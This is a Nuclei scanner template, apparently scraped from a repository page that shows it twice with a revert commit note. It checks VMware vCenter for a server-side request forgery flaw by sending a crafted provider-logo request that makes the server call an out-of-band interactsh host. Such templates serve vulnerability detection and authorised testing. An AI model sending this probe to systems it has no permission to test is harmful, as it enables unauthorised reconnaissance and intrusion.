nuclei-templates/vulnerabilities/vmware/vmware-vcenter-ssrf.yaml

id: vmware-vcenter-ssrf

info:
  name: VMware vCenter SSRF/LFI/XSS
  author: pdteam
  severity: critical
  reference: https://github.com/l0ggg/VMware_vCenter
  tags: ssrf,lfi,xss,oast

requests:
  - method: GET
    path:
      - "{{BaseURL}}/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=https://{{interactsh-url}}"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: status
        status:
          - 200
Revert "CVE update - CVE-2021-22049" This reverts commit 70128c2587fa915de22b8bbf5aee715bd41c63b9. 2021-12-01 20:04:29 +00:00			`id: vmware-vcenter-ssrf`

			`info:`
			`name: VMware vCenter SSRF/LFI/XSS`
			`author: pdteam`
			`severity: critical`
			`reference: https://github.com/l0ggg/VMware_vCenter`
			`tags: ssrf,lfi,xss,oast`

			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=https://{{interactsh-url}}"`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: interactsh_protocol`
			`words:`
			`- "http"`

			`- type: status`
			`status:`
			`- 200`